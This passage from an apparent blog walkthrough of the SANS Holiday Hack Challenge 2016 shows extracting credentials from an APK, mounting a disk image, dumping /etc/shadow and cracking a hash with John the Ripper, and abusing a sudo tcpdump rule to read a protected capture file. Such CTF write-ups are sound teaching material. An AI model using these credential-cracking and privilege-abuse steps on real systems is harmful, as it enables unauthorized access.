    &lt;span class="o"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Exception&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt; &lt;span class="o"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;Log&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;e&lt;/span&gt;&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="n"&gt;a&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="n"&gt;e&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="na"&gt;getMessage&lt;/span&gt;&lt;span class="o"&gt;());&lt;/span&gt;
    &lt;span class="o"&gt;}&lt;/span&gt;
&lt;span class="o"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The credentials in the APK file are &lt;code&gt;guest/busyreindeer78&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We're then supposed to look at an audio file. To do this, we have to take a
look at the resources of the APK file. To do this, we'll unzip the APK. Indeed,
APK files are just particular ZIP files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; unzip -d SantaGram_4.2_unzipped SantaGram_4.2.apk
&lt;span class="go"&gt;Archive:  SantaGram_4.2.apk&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2_unzipped/AndroidManifest.xml&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2_unzipped/META-INF/CERT.RSA&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2_unzipped/META-INF/CERT.SF&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2_unzipped/META-INF/MANIFEST.MF&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2_unzipped/assets/tou.html&lt;/span&gt;
&lt;span class="go"&gt;  inflating: SantaGram_4.2_unzipped/classes.dex&lt;/span&gt;
&lt;span class="go"&gt;[snip for brievety]&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt; extracting: SantaGram_4.2_unzipped/res/raw/discombobulatedaudio1.mp3&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt; extracting: SantaGram_4.2_unzipped/resources.arsc&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The name of the audio file in the SantaGram APK file is
&lt;code&gt;discombobulatedaudio1.mp3&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="part-3-a-fresh-baked-holiday-pi"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id3"&gt;Part 3: A Fresh-Baked Holiday Pi&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;Despite what we've learned on the SantaGram bug bounty program, we're nowhere
closer to learn where Santa Claus is being held. By roaming the North Pole,
we can see password protected doors:&lt;/p&gt;
&lt;img alt="password_protected_door.png" class="align-center" src="/images/sans-christmas-challenge-2016/password_protected_door.png" /&gt;
&lt;p&gt;Next to these doors, we can see little terminals. However, in order to interact
with these terminals, we need a little system called a &lt;a class="reference external" href="https://en.wikipedia.org/wiki/Raspberry_Pi"&gt;Cranberry Pi&lt;/a&gt;.
In a sense, we're in luck because by talking to the elf Wunorse Openslae
(&lt;a class="reference external" href="https://www.youtube.com/watch?v=3PgNPc-iFW8"&gt;hey!&lt;/a&gt;), we learn that Santa's
sleigh is equiped with a Cranberry Pi, to control the SCADA interface:&lt;/p&gt;
&lt;img alt="cranpi_introduction.png" class="align-center" src="/images/sans-christmas-challenge-2016/cranpi_introduction.png" /&gt;
&lt;p&gt;Indeed, strewn across the North Pole, we can find pieces of the Cranberry Pi
system:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;A Cranberry Pi board&lt;/li&gt;
&lt;li&gt;A heat sink (why would you need one in the North Pole in the first place?)&lt;/li&gt;
&lt;li&gt;An HDMI cable&lt;/li&gt;
&lt;li&gt;An SD card&lt;/li&gt;
&lt;li&gt;A power cord&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We now have a full Cranberry Pi system. The only missing part is given by the
elf Holly Evergreen: a &lt;a class="reference external" href="https://www.northpolewonderland.com/cranbian.img.zip"&gt;Cranbian image&lt;/a&gt;,
which we can use to boot on our Cranberry Pi.&lt;/p&gt;
&lt;p&gt;However, in order to use our CranPi, we need the password to open a user
session. Luckily, &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2016/12/07/mount-a-raspberry-pi-file-system-image"&gt;this tutorial&lt;/a&gt;
by Josh Wright teaches us how we can mount a Raspberry Pi file system image.
Since Cranberry Pi and Raspberry Pi are basically the same (wake up, sheeple!),
we now know how to mount our Cranbian image:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; unzip cranbian.img.zip
&lt;span class="go"&gt;Archive:  cranbian.img.zip&lt;/span&gt;
&lt;span class="go"&gt;  inflating: cranbian-jessie.img&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; /sbin/fdisk -l cranbian-jessie.img

&lt;span class="go"&gt;Disque cranbian-jessie.img : 1,3 GiB, 1389363200 octets, 2713600 secteurs&lt;/span&gt;
&lt;span class="go"&gt;Unités : secteur de 1 × 512 = 512 octets&lt;/span&gt;
&lt;span class="go"&gt;Taille de secteur (logique / physique) : 512 octets / 512 octets&lt;/span&gt;
&lt;span class="go"&gt;taille d&amp;#39;E/S (minimale / optimale) : 512 octets / 512 octets&lt;/span&gt;
&lt;span class="go"&gt;Type d&amp;#39;étiquette de disque : dos&lt;/span&gt;
&lt;span class="go"&gt;Identifiant de disque : 0x5a7089a1&lt;/span&gt;

&lt;span class="go"&gt;Device               Boot  Start     End Sectors  Size Id Type&lt;/span&gt;
&lt;span class="go"&gt;cranbian-jessie.img1        8192  137215  129024   63M  c W95 FAT32 (LBA)&lt;/span&gt;
&lt;span class="go"&gt;cranbian-jessie.img2      137216 2713599 2576384  1,2G 83 Linux&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; mkdir cranbian_img_extracted
&lt;span class="gp"&gt;$&lt;/span&gt; sudo mount -v -o &lt;span class="nv"&gt;offset&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;$((&lt;/span&gt;&lt;span class="m"&gt;512&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="m"&gt;137216&lt;/span&gt;&lt;span class="k"&gt;))&lt;/span&gt; -t ext4 ./cranbian-jessie.img ./cranbian_img_extracted
&lt;span class="go"&gt;mount : /dev/loop0 monté sur ./cranbian_img_extracted.&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; ls cranbian_img_extracted/
&lt;span class="go"&gt;bin  boot  dev  etc  home  lib  lost+found  media  mnt  opt  proc  root  run  sbin  srv  sys  tmp  usr  var&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have access to the Cranbian file system. This means that we can try to
crack passwords in the &lt;code&gt;shadow&lt;/code&gt; file.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; cat cranbian_img_extracted/etc/shadow
&lt;span class="go"&gt;root:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;daemon:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;bin:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;sys:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;sync:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;games:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;man:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;lp:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;mail:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;news:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;uucp:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;proxy:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;www-data:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;backup:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;list:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;irc:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;gnats:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;nobody:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;systemd-timesync:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;systemd-network:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;systemd-resolve:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;systemd-bus-proxy:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;messagebus:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;avahi:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;ntp:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;sshd:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="go"&gt;statd:*:17067:0:99999:7:::&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="gp"&gt;cranpi:$6$2AXLbEoG$&lt;/span&gt;zZlWSwrUSD02cm8ncL6pmaYY/39DUai3OGfnBbDNjtx2G99qKbhnidxinanEhahBINm/2YyjFihxg7tgc343b0:17140:0:99999:7:::
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can do so by using John the Ripper with the &lt;a class="reference external" href="https://github.com/danielmiessler/SecLists/raw/master/Passwords/rockyou.txt.tar.gz"&gt;rockyou&lt;/a&gt;
dictionary:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; john --wordlist&lt;span class="o"&gt;=&lt;/span&gt;./rockyou.txt ./cranbian_img_extracted/etc/shadow
&lt;span class="go"&gt;Using default input encoding: UTF-8&lt;/span&gt;
&lt;span class="go"&gt;Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])&lt;/span&gt;
&lt;span class="go"&gt;Will run 4 OpenMP threads&lt;/span&gt;
&lt;span class="go"&gt;Press &amp;#39;q&amp;#39; or Ctrl-C to abort, almost any other key for status&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;yummycookies     (cranpi)&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;1g 0:00:06:12 DONE (2016-12-24 19:11) 0.002687g/s 1221p/s 1221c/s 1221C/s 03698741..yoatzin&lt;/span&gt;
&lt;span class="go"&gt;Use the &amp;quot;--show&amp;quot; option to display all of the cracked passwords reliably&lt;/span&gt;
&lt;span class="go"&gt;Session completed&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now have a valid account: &lt;code&gt;cranpi/yummycookies&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;We can now interact with every terminal in the North Pole. Every terminal is
basicaly a minimal Linux system on which we have to find some sort of flag,
to use as a passphrase to open the door next to it.&lt;/p&gt;
&lt;div class="section" id="elf-house-2"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id4"&gt;Elf House #2&lt;/a&gt;&lt;/h3&gt;
&lt;pre class="literal-block"&gt;
*******************************************************************************
*                                                                             *
*To open the door, find both parts of the passphrase inside the /out.pcap file*
*                                                                             *
*******************************************************************************
&lt;/pre&gt;
&lt;p&gt;So, apparently, the passphrase is in two parts, in a network capture file.
Let's take a look at this file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;scratchy@31368df46952:/$&lt;/span&gt; ls -l /out.pcap
&lt;span class="go"&gt;-r-------- 1 itchy itchy 1087929 Dec  2 15:05 /out.pcap&lt;/span&gt;
&lt;span class="gp"&gt;scratchy@31368df46952:/$&lt;/span&gt; cat /out.pcap
&lt;span class="go"&gt;cat: /out.pcap: Permission denied&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, this file belongs to user &lt;code&gt;itchy&lt;/code&gt;, and we can't read it. Let's see
what's installed on the system:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;scratchy@31368df46952:/$&lt;/span&gt; cat /var/log/apt/history.log
&lt;span class="go"&gt;Start-Date: 2016-11-04  18:30:58&lt;/span&gt;
&lt;span class="go"&gt;Commandline: apt-get dist-upgrade -y&lt;/span&gt;
&lt;span class="go"&gt;Upgrade: tzdata:amd64 (2016f-0+deb8u1, 2016h-0+deb8u1), tar:amd64 (1.27.1-2+b1, 1.27.1-&lt;/span&gt;
&lt;span class="go"&gt;2+deb8u1)&lt;/span&gt;
&lt;span class="go"&gt;End-Date: 2016-11-04  18:31:00&lt;/span&gt;
&lt;span class="go"&gt;Start-Date: 2016-12-01  21:18:39&lt;/span&gt;
&lt;span class="go"&gt;Commandline: apt-get install -y tcpdump sudo nano vim binutils&lt;/span&gt;
&lt;span class="go"&gt;Install: nano:amd64 (2.2.6-3), libssl1.0.0:amd64 (1.0.1t-1+deb8u5, automatic), tcpdump:&lt;/span&gt;
&lt;span class="go"&gt;amd64 (4.6.2-5+deb8u1), libpcap0.8:amd64 (1.6.2-2, automatic), vim-common:amd64 (7.4.48&lt;/span&gt;
&lt;span class="go"&gt;8-7+deb8u1, automatic), sudo:amd64 (1.8.10p3-1+deb8u3), binutils:amd64 (2.25-5), vim:am&lt;/span&gt;
&lt;span class="go"&gt;d64 (7.4.488-7+deb8u1), vim-runtime:amd64 (7.4.488-7+deb8u1, automatic), libgpm2:amd64&lt;/span&gt;
&lt;span class="go"&gt;(1.20.4-6.1+b2, automatic)&lt;/span&gt;
&lt;span class="go"&gt;End-Date: 2016-12-01  21:18:41&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, &lt;code&gt;sudo&lt;/code&gt; and &lt;code&gt;tcpdump&lt;/code&gt; were both installed on the system. Maybe
there's a particular configuration in the &lt;code&gt;/etc/sudoers&lt;/code&gt; file that allows
us to run &lt;code&gt;tcpdump&lt;/code&gt; as &lt;code&gt;itchy&lt;/code&gt; without having to provide any
password... Let's try to use &lt;code&gt;sudo&lt;/code&gt; and &lt;code&gt;tcpdump&lt;/code&gt; to read the
content of the file, and write it in another one:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;scratchy@31368df46952:/$&lt;/span&gt; sudo -u itchy tcpdump -r /out.pcap -w /tmp/out2.pcap
&lt;span class="go"&gt;sudo: unable to resolve host 31368df46952&lt;/span&gt;
&lt;span class="go"&gt;reading from file /out.pcap, link-type EN10MB (Ethernet)&lt;/span&gt;
&lt;span class="gp"&gt;scratchy@31368df46952:/$&lt;/span&gt; ls -lh /tmp/out2.pcap
&lt;span class="go"&gt;-rw-r--r-- 1 itchy itchy 1.1M Dec 25 02:56 /tmp/out2.pcap&lt;/span&gt;
&lt;span class="gp"&gt;scratchy@31368df46952:/$&lt;/span&gt; sha256sum /tmp/out2.pcap
&lt;span class="go"&gt;07ec6f56c937fc939c8eb64c454ece277f8c1e4f8b851781ce7f4451d48ec985  /tmp/out2.pcap&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;w00t, we we're indeed able to copy the content of the file to another file,
which we can read, since we were able to compute its sha256 sum.&lt;/p&gt;
&lt;p&gt;I learned afterwards the existence of the &lt;code&gt;-l&lt;/code&gt; flag in &lt;code&gt;sudo&lt;/code&gt;:&lt;/p&gt;
&lt;pre class="literal-block"&gt;
SUDO(8)                                                                            BSD System Manager's Manual                                                                            SUDO(8)

NAME
     sudo, sudoedit — execute a command as another user

SYNOPSIS
     sudo -h | -K | -k | -V
     sudo -v [-AknS] [-a type] [-g group] [-h host] [-p prompt] [-u user]
     sudo -l [-AknS] [-a type] [-g group] [-h host] [-p prompt] [-U user] [-u user] [command]
[...]
     -l, --list  If no command is specified, list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.  A longer list format
                 is used if this option is specified multiple times and the security policy supports a verbose output format.
&lt;/pre&gt;
&lt;p&gt;And all this time, I was thinking:&lt;/p&gt;
&lt;blockquote&gt;
Hmm, is there a way to list what you can do with &lt;code&gt;sudo&lt;/code&gt; when you
can't read the &lt;code&gt;/etc/sudoers&lt;/code&gt; file? Well, I'll search later!&lt;/blockquote&gt;
&lt;p&gt;Why, yes, Yannick, it &lt;strong&gt;IS&lt;/strong&gt; possible! It's the &lt;code&gt;-l&lt;/code&gt; flag! You lazy, you.
#TheMoreYouKnow&lt;/p&gt;
&lt;p&gt;Anyway, if you issue &lt;code&gt;sudo -l&lt;/code&gt;, you can see that we can indeed run
&lt;code&gt;tcpdump&lt;/code&gt; and &lt;code&gt;strings&lt;/code&gt; as the &lt;code&gt;itchy&lt;/code&gt; user, without knowing
the &lt;code&gt;scratchy&lt;/code&gt; user's password:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;scratchy@8bb89db76dd2:/$&lt;/span&gt; sudo -l
&lt;span class="go"&gt;sudo: unable to resolve host 8bb89db76dd2&lt;/span&gt;
&lt;span class="go"&gt;Matching Defaults entries for scratchy on 8bb89db76dd2:&lt;/span&gt;
&lt;span class="go"&gt;    env_reset, mail_badpass,&lt;/span&gt;
&lt;span class="go"&gt;    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin&lt;/span&gt;
&lt;span class="go"&gt;User scratchy may run the following commands on 8bb89db76dd2:&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;    (itchy) NOPASSWD: /usr/sbin/tcpdump&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;&lt;span class="go"&gt;    (itchy) NOPASSWD: /usr/bin/strings&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now that I had a readable copy of the PCAP file, I extracted the content of
this PCAP, by base64 encoding, so that I could analyze it on my own machine.
You can download the PCAP file &lt;a class="reference external" href="/docs/sans-christmas-challenge-2016/out.pcap"&gt;here&lt;/a&gt;
(sha256: &lt;code&gt;07ec6f56c937fc939c8eb64c454ece277f8c1e4f8b851781ce7f4451d48ec985&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;We can now open the PCAP file in Wireshark, which is a hell of a lot nicer than
analyzing it on the terminal:&lt;/p&gt;
&lt;img alt="wireshark_pcap.png" class="align-center" src="/images/sans-christmas-challenge-2016/wireshark_pcap.png" /&gt;
&lt;p&gt;We can see a request to a file called &lt;code&gt;firsthalf.html&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/firsthalf.html&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wget/1.17.1 (darwin15.2.0)&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;identity&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;192.168.188.130&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Keep-Alive&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.0&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SimpleHTTP/0.6 Python/2.7.12+&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 02 Dec 2016 11:28:00 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/html&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;113&lt;/span&gt;
&lt;span class="na"&gt;Last-Modified&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 02 Dec 2016 11:25:35 GMT&lt;/span&gt;

&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;head&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;form&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;input&lt;/span&gt; &lt;span class="na"&gt;type&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;hidden&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;name&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;part1&amp;quot;&lt;/span&gt; &lt;span class="na"&gt;value&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="s"&gt;&amp;quot;santasli&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;/&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;form&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;body&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;html&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We have the first half of our passphrase, &lt;code&gt;santasli&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, to take a look at the second half. We can see that there is another
HTTP request, for the second half:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/secondhalf.bin&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wget/1.17.1 (darwin15.2.0)&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;identity&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;192.168.188.130&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Keep-Alive&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.0&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;SimpleHTTP/0.6 Python/2.7.12+&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 02 Dec 2016 11:28:00 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;application/octet-stream&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1048097&lt;/span&gt;
&lt;span class="na"&gt;Last-Modified&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Fri, 02 Dec 2016 11:26:12 GMT&lt;/span&gt;

L}*.O..r.v./....v....z{.x.&amp;#39;.l.(..@.1].X...k7.?.../.B..G.FPj.`~.%.....a~.;90.cLgc.q2..`.D.x...V....6...........@...x. %JK...kO...Idw..&amp;lt;..G.\.
....... .....(.._.1sf..)$mg@..=.*
........
[snip]
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that a lot of binary content is being downloaded. I extracted it,
and tried to identify it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; file secondhalf.bin
&lt;span class="go"&gt;secondhalf.bin: data&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Uh oh, &lt;code&gt;file&lt;/code&gt; was not able to identify the type of file. Maybe the start
of the file is just garbage, but there are some files carved later in the file.
Let's use &lt;code&gt;binwalk&lt;/code&gt;, it should give us something to work with:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; binwalk secondhalf.bin

&lt;span class="go"&gt;DECIMAL       HEXADECIMAL     DESCRIPTION&lt;/span&gt;
&lt;span class="go"&gt;--------------------------------------------------------------------------------&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Damn, nothing. Maybe &lt;code&gt;foremost&lt;/code&gt; will have more luck?&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; foremost secondhalf.bin
&lt;span class="go"&gt;Processing: secondhalf.bin&lt;/span&gt;
&lt;span class="go"&gt;|*|&lt;/span&gt;
&lt;span class="gp"&gt;$&lt;/span&gt; cat output/audit.txt
&lt;span class="go"&gt;Foremost version 1.5.7 by Jesse Kornblum, Kris Kendall, and Nick Mikus&lt;/span&gt;
&lt;span class="go"&gt;Audit File&lt;/span&gt;

&lt;span class="go"&gt;Foremost started at Mon Dec 26 00:44:48 2016&lt;/span&gt;
&lt;span class="go"&gt;Invocation: foremost secondhalf.bin&lt;/span&gt;
&lt;span class="go"&gt;Output directory: output&lt;/span&gt;
&lt;span class="go"&gt;Configuration file: /etc/foremost.conf&lt;/span&gt;
&lt;span class="go"&gt;------------------------------------------------------------------&lt;/span&gt;
&lt;span class="go"&gt;File: secondhalf.bin&lt;/span&gt;
&lt;span class="go"&gt;Start: Mon Dec 26 00:44:48 2016&lt;/span&gt;
&lt;span class="go"&gt;Length: 1009 KB (1033943 bytes)&lt;/span&gt;

&lt;span class="go"&gt;Num  Name (bs=512)         Size  File Offset     Comment&lt;/span&gt;

&lt;span class="go"&gt;Finish: Mon Dec 26 00:44:48 2016&lt;/span&gt;

&lt;span class="go"&gt;0 FILES EXTRACTED&lt;/span&gt;

&lt;span class="go"&gt;------------------------------------------------------------------&lt;/span&gt;

